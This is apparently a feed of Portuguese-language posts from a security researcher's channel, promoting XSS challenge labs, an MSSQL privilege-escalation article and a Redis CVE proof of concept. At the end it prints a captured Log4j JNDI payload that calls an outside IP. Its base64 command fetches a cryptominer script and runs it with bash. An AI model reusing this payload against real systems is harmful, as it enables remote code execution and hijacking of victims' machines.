Oi, meu amigo! Tô torcendo pra vc triggar esse xss ae, bora bora!
MUITO OBRIGADO!
Galera, o site está com muito engajamento, muitos acessos. Isso motiva demais a continuar trazendo conteúdo para vocês.

O site existe somente pra esse propósito: Vocês!

Tenho muito orgulho do que estamos construindo. Se curtiu algum artigo, me deixe saber comentando aqui, reagindo, mandando DM ou mandando para algum amigo!

Abç, zeroc00i
Update:
Seção com uns vídeos do Tiktok incluída:
https://brunomenozzi.com/TikTok/
Tá acordado ainda?

Essa vai pra tu que não sabia como começar os desafios: As resoluções dos desafios foram publicadas no site agora mesmo!!! 😎🥳

Tem os links de cada um na coluna resolução: https://brunomenozzi.com/desafios/acessos/

Ou acesse tambem pelo submenu "Respostas", no menu Desafios

Ufa, agora posso dormir. Disconnected
Bruno Menozzi (Zeroc00I)
Salve. Resolveu esse desafio de xss já? (https://brunomenozzi.com/desafios/xss.php) Me contaram que o sysadmin publicou a versão 2 dele. Dê uma olhada se teu payload ainda funciona! Se sim, manda o alert(1337) de novo! https://brunomenozzi.com/desafios/xss2.php
bom dia!
Desafio 3 de xss publicado agora agora
https://brunomenozzi.com/desafios/xss3.php

Nos comentários vou deixar a lista de parametros que os desafios usam (o foco dos labs é sempre não ter um guessing absurdo e mais lógica mesmo) (sim revisei manualmente e o parametro está ali!)
POST NOVO saindo do forno:
https://brunomenozzi.com/posts/MSSQL/alem_do_dumping/

No post "MSSQL: Além do Dumping", abordamos vulnerabilidades críticas no SQL Server que muitos pentesters desconhecem, indo muito além das técnicas tradicionais.

Além do dumping de tabelas e tentativas de RCE, o post cobre:

• SQL Links para movimento lateral entre servidores
• Ownership chaining entre bancos de dados
• Escalação de privilégios via impersonation
• Técnicas de leitura de arquivos via error-based
• Descoberta de conexões de rede ativas
• Abuso de cadeias de confiança (trust chains)

Revelamos como usuários com poucos privilégios podem se tornar sysadmin explorando configurações inadequadas e funcionalidades nativas do MSSQL, transformando uma simples SQL Injection em acesso completo ao ambiente.
Tu manja de xss? Quero ver então!

Que comece a saga dos mini labs!

https://brunomenozzi.com/desafios/xss.php

Manda aqui nos comentários um PRINT (sem expor o payload que tu usou) c/ um alert(1337)!

Nada de self xss / alert no console do navegador ein hahah
Fala sério, essa engenharia social foi foda (pra quem não pegou a sacada, é que o JS consegue jogar payload pro ctrl + v das pessoas. O atacante criou uma página pra simular que deu erro, inventa um motivo e faz a pessoa colar o comando no executar do windows, tendo acesso ao PC da vítima e provavelmente ganhando uma persistência)
CVE-2025-49844 (RediShell) - Proof of Concept
Use-After-Free vulnerability in Redis Lua interpreter

https://github.com/raminfp/redis_exploit

Eu dei uma conferida no source, parece autentico e sem fins maliciosos, mas sempre verifiquem e assuma o risco por sua conta GitHub - raminfp/redis_exploit: CVE-2025-49844 (RediShell)
Alguém on aí pra eu pedir um favor de teste no site (acessar e ficar navegando)?
https://brunomenozzi.com/
Bruno Menozzi (Zeroc00I)
ei, já almoçou?! Agora clica no link para ler o conteúdo que eu tinha te falado ontem! "Como sair dos duplicados em Bugbounty?" https://brunomenozzi.com/VIP/como_sair_de_duplicados_part1/ Essa é a parte 1 da nossa saga! Espero que gere alguns insights pra…
Quando falei em Log4j nesse post, saca só uns payloads que geralmente assim que tu expõe um IP pra internet ele começa a receber (vide imagem).

Isso independe do que tu ta executando na tua VPS. No meu caso o blog foi feito com hugo + o tema geekdocs.

Como vocês são hackers, eu vou de site estático mesmo hahaha

Payload:
User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')
Back to Top